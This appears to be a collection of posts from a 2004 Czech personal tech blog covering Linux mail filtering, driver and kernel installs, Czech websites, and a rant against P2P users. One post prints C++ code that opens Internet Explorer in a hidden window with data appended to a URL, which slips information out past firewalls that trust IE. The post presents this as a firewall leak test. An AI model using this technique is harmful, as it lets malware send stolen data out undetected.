MyEgo.cz - Radek Hulán webzine

Pod Linuxem existuje několik velice slušných email spam-filterů. Jeden z nejlepších je Spam Assassin, pro “domácí” použití je naopak vhodný Bogofilter, založený na Bayes pravděpodobnosti spamu/hamu a učící se databázi slov.

Nový KMail, email klient pro KDE 3.3.0 dokonce umožňuje automatické vytvoření pár filtrovacích pravidel pro Bogofilter (a další anti-spam řešení). Po instalaci Bogofiltru postačí tedy spustit KMail AntiSpam wizard, předem je vhodné vytvořit si složku spam, a automaticky vytvořená pravidla, plus ikona v toolbaru, umožní okamžité hodnocení obsahu Vaší pošty.

KMail se v KDE 3.3.0 vůbec stal profesionální aplikací, lepší než TheBat! na Windows, včetně podpory pro GnuPG a S/MIME, rozmanitých filtrů a “pipes” (které na Linuxu, na rozdíl od Windows, mají smysl), antispamu, či antiviru.

Nové KDE 3.3.0, pokud si člověk zapne průhlednosti a dekorace oken, je nádherné a velice funkční, mnohem komfortnější než Windows Longhorn (nemluvě už vůbec o tom, že ani Longhorn nebude mít Bash), nicméně, docela náročné na zdroje. Není tedy od věci instalovat si nejnovější ovladače nVidia karet.

Nejprve je nutné si stáhnout instalační program z nVidia webu. Vlastní instalace na SuSE 9.1 potom může proběhnout následovně (pokud máte instalovány zdrojové kódy kernelu, v mém případě verze 2.6.8.1-rADo):

init 3
rmmod nvidia
cd /usr/src/linux
make cloneconfig
make prepare_all
sh NVIDIA-Linux-x86-1.0-6111-pkg1.run
sax2 -m 0=nvidia

Již nikdy více telefon bez Symbianu, tak by šla nazvat moje dvoutýdenní zkušenost se Siemensem SX1. Tento článek si neklade za cíl nic jiného, než prostředí Symbianu přiblížit na 20 dalších screenshotech.

Word a Excel:

Když jsem v roce 1998 chtěl vědět něco o mobilech, podíval jsem se automaticky na www.mobil.cz, a to zvláště na články Patricka Zandla. Místo abych si kupoval noviny, četl jsem idnes.cz. Když se na ty weby podívám dnes, mám pocit, že se na nich, bohužel, nic nezměnilo. Stále stejná, kdysi sice dobrá, ale dnes velice zastaralá struktura webu, pomalé načítání, zmatená a nepřehledná navigace… Není tu žádný vývoj. Dinosauři se nemění.

Když vznikla www.mobilmania.cz, působila oproti zavedenému mobil.cz značně amatérsky. Marek Lutonský, a další lidé, ovšem od té doby dostali tento server na úroveň lepší, než je mobil.cz. Dnešní mobilmania.cz je tak mnohem rychlejší než mobil.cz na načítání, její recenze jsou obsažnější, bleskovky jsou bleskovější, navigace po webu je jednodušší, rozsah služeb je větší. Na mobil.cz se vlastně dívám již jen z nostalgie, popřípadě, pokud chci něco kupovat a hledám veškeré dostupné informace.

Stejné je to i se zpravodajstvím. Kdysi nepokořená, první a vedoucí online forma deníku DNES, tedy idnes.cz, má dnes štíhlejšího, rychlejšího, a mnohem kvalitnějšího soupeře v www.novinky.cz. Ano, novinky.cz jsou redakce deníku (Rudé) Právo, noviny, které bych si nikdy, ze zásady, nekoupil, nicméně, jejich online verze nabízí ty samé zprávy z ČTK a Reuters, co idnes.cz, ale přehledněji, rychleji, a v lepším balení.

Dinosauři, co “zakládali český internet”, svoji roli, jak už to tak často bývá, nezvládli, ustrnuli ve vývoji, a nahradila je mladší, progresivnější, generace.

I když i v roce 2004 bych se styděl koupit si na stánku (Rudé) Právo, www.novinky.cz čtu, vedle zpráv nytimes.com, a to zcela běžně… ;-)

Narazil jsem dnes na takový pěkný malý prográmek, má 3 KB z webu tooleaky.zensoft.com, který krásně ukazuje, proč je Vaše firewall zcela k ničemu. Již dávno jsem psal o tom, že nejen antivirus je k ničemu, ale, že k ničemu je i samotná firewall, pokud není provázána se SandBoxem.

Zkuste si ten prográmek schválně stáhnout a spustit. Stažení i spuštění zabere 10 sekund. Pokud se Vám ukáže “success”, máte problém. Ten prográmek totiž využívá léta známé chyby řady Windows firewallů, a totiž, autorizace přístupu MSIE na internet (nutné třeba pro online Windows Update), a následné zneužití MSIE jinými programy. Stačí na to pár řádků kódu v C++:

bool TransmitAndReceiveData ( ) {
 // Step 1: Find the MSIE
 char buffer[MAX_PATH + 512];
 long len = sizeof(buffer);
 RegQueryValueA(
 HKEY_LOCAL_MACHINE,
 "SOFTWARE\\Classes\\Applications"+
 "\\iexplore.exe\\shell\\open\\command",
 buffer,
 &len);
 // Step 2: spawn IE in a hidden window
 for ( char*c = &buffer[1]; *c != 0; c++ )
   if ( *c == '%' ) *c = 0;
 z_strcat(buffer, baseURL);
 z_strcat(buffer, outputString);
 WinExec(buffer, SW_HIDE);
 // Step 3: wait for the page to load
 int startCount = GetTickCount();
 do {
   EnumWindows(EnumWindowsProc, 0);
   if ( (GetTickCount() - startCount) > 30000 )
     return false;
 } while ( ieWnd == NULL );
 // Step 4: close the window
 SendMessage(ieWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
 return true;
}

Takto jednoduše může libovolný virus zavolat MSIE, které je autorizováno přistupovat k internetu, a potom libovolně zasílat, co se mu zlíbí. Pěkné, ne? Pokud jste aspoň jednou navštívili s MSIE nějakou warez či porno stránku, spustili si P2P klienta, nebo nějaký “keygen”, jen tak stažený z webu, je docela dost dobře možné, že na počítači máte škůdce. A to škůdce, kterého Vaše firewall nikdy neodhalí, a nezachytí jej ani antivirus či spyware (ty se skutečně nesoustředí na nákazy získané z warez a porno odkazů)…

Microsoftí firewall toto vůbec neumí, Tiny Personal Firewall, mnou preferovaná, to umí, ZoneAlarm Pro to sice umí, ale má to defaultně vypnuté i ve verzi 5.1.

V posledních dvou dnech je na českých mobil(mania) fórech hodně slyšet zástupce českého xindlu. Český xindl si myslí, že:

hnědka: stahnout 5.2 GB na GPRS? to je tak 12 dni v kuse, slusny na CDMA bys za 12 dní, pokud jsi z nevytizene lokality, stahnul treba i 100 GB nebo klidne i o polovinu víc, osobne jsem natahal za srpen asi 40 GB dokud nedoslo misto na disku :-)

anebo další sosač, takový malý krypto-komunista, který ospravedlňuje krádež tím, že má malý plat, a tudíž on má právo krást:

majki: az stat zavede takovou cenovou politiku, ktera bude umerna platum, potom at si tady kazdy zakazuje P2P, jak se mu zlibi. Az si tady normalni clovek (prum. cisty plat 13000) vydela (priklad) na original Windows za dva dny prace, pak at se ohaneji papalasove warezem a nelegalnim softwarem. Sami neumeji prizpusobit prostredi k tomu, aby tohle lide nedelali. Tenhel priklad se da pouzit na spousty dalsiho, jako jsou AudioCD, DVD…

Hodil by se zde malý příklad : řekněme tomu, že jste ISP pro malou komunitní síť. Každý ve vesnici Vám platí 200 Kč měsíčně. Všechno funguje dobře, komunita je spokojená, že má slušně rychlý a levný internet.

Ale najednou se Franta Xindl Sosač rozhodne, že potřebuje krást více a více a více filmů, hudby a software, a nechává své DC++ puštěné pořád, i když je pryč, spí, či je ve škole. Prostě je to pro Frantu Xindla Sosače takový novodobý fetish. Hromadit a hromadit! Ukrást, co se dá! Franta Xindl Sosač se tímto prostě realizuje…

Jak to dopadne? Paní Vomáčková odvedle, co posílá email synovi, a přes Skype si s ním volá do USA, si začne stěžovat, že jí to skoro vůbec nejede. Aby taky jelo… Dalších 10 lidí, co normálně používají internet, nesosají a nekradou, si začnou stěžovat také.

Jakou máte jako ISP možnost? Celou službu zrušit a prodělat? Nebo odříznout jednoho Frantu Xindla Sosače, a uspokojit 10 normálních zákazníků? Nebo zavést limity na přenos dat? Jenže, limity, zkuste si zavést limity, neboli F.U.P. jako má ADSL, a zjistíte, že paní Vomáčková je nemocná, a syn jí volá častěji, ale díky limitu už po pár dnech nemůže vůbec nic… Další zákazník si stáhne z FTP legálně jeden ISO obraz Linuxu, a pak už taky nemůže celý zbytek měsíce na internet. Naštvaní jsou na Vás za chvíli všichni, a vy proděláváte…

Anebo zaveďte řešení, geniální, Eurotelu. Omezte Frantu Xindla Sosače. Xindl bude naštvaný, bude řvát na celou vesnici, ale všichni ostatní budou spokojeni. A Vy budete realizovat spravedlivý zisk.

Proč je toto řešení nejlepší? Protože komunismus opravdu nefunguje.

Eurotel vymyslel skvělé řešení, jak nezavádět F.U.P. (které je u ADSL), a nabídnout naopak vyšší praktickou rychlost připojení pro lidi, co s internetem pracují. Omezil P2P sítě. 100% uživatelů P2P sítí je používá jen pro krádeže hudby, filmů a software (nebo znáte jiné použití???), což mě osobně sice nebolí, nejsem producent, nicméně, to že tito sosači dokáží stáhnout denně i několik GB dat, to už poznat je, na rychlosti či pomalosti připojení mého. A tudíž se mě to osobně týká.

Nemám rád sosače a zloděje, Eurotel také ne, i když z poněkud jiného důvodu, za 890 Kč měsíčně na nich totiž velice nehezky prodělává. Nové řešení, blokace P2P služeb (jejich portů) v dobu kromě 1:00 - 9:00 ráno je mimořádně elegantní, a přínosná. Děkuji! :-)

S GTRAN USB modemem je poměrně dost problémů na Windows, hlavně s ovladači, a tento problém se nevyhnul ani Linuxu. Nicméně, zde jsou, na rozdíl od Windows, dostupné zdrojové kódy, takže se vše dá poměrně snadno řešit. Zajímavé je, že GTRAN modem na jádru 2.6.8.1 je naprosto stabilní, zatímco na Windows má problémy, nechce se připojovat a autorizovat, či často padá. Linux s CDMA tímto problémem netrpí.

Jeden problém ale existuje, tedy, spíše existoval, i na Linuxu. Modem přenášel data maximální rychlostí 256Kbps. Toto není problém jádra Linuxu, ale modemu, který reportoval chybnou velikost max_packet_size. Po jednoduché úpravě souboru cdc-acm.c, který vnutí pro Quallcom GTRAN modem jádru jiný parametr, a rekompilaci kernelu, to jede kolem 480 kbps (mě i více, ale hodně lidem ne). Celý problém byl popsán na abclinuxu.cz.

Jak tedy na rychlejší CDMA na Linuxu?

Z http://kernel.org/ si stáhněte kernel 2.6.8.1, a aplikujte na soubor cdc-acm.c jednoduchý patch Petra Písaře (nebo těch deset řádků doplňte ručně, pokud máte jinou verzi kernelu než 2.6.8.1). Potom kernel překompilujte a instalujte.

su
cd /usr/src/linux
cp arch/i386/defconfig.smp .config
make xconfig
make
make modules_install
make install

Pokud používáte grub, je to celé… V případě lilo modifikujte ručně lilo.cnf. Obrovskou výhodou rekompilace celého kernelu je to, že si jej přizpůsobíte pro svůj stroj, a optimalizujete, je tak menší, optimalizovaný pro (v mém případě) P-IV/HT, a stabilnější. Zajímavostí je, že jsem kompilaci prováděl s gcc 3.3.3 (doporučováno je gcc 2.93.x), a nebyl žádný problém.

Pokud se nechcete pouštět do kernelu, který není upraven SuSE, můžete si přes YaST stáhnout zdroj pro kernel 2.6.4, a provést ručně úpravu na něm, nicméně, s vanilla kernelem 2.6.8.1 jsem neměl žádný problém. Jak zdroj pro YaST uveďte:

ftp://ftp.sh.cvut.cz/SuSE/i386/9.1/

Pokud kompilujete na Linuxu, jsou pro to 2 důvody:

• protože neexistuje binárka, jakou potřebujete (což je typické pro PHP/MySQL/Apache kombinaci),
• protože chcete kód optimalizovat (většina binárek je pro i386 - i586).

K gcc je dostupná řada parametrů, které ovlivňují kompilační a linkovací proces, osobně používám následující, tedy zapnutí podpory pro P-IV, SSE2 instrukční sady, optimalizací kódu (O2), zapnutí pipes pro kompilaci, a odstranění tabulky symbolů z binárky:

export CFLAGS="-march=pentium4 -mfpmath=sse 
               -msse2 -O2 -pipe -s
               -fomit-frame-pointer"

Chci to větší!

Upozornění: zvětšenina má cca 320KB, nic pro dial-up!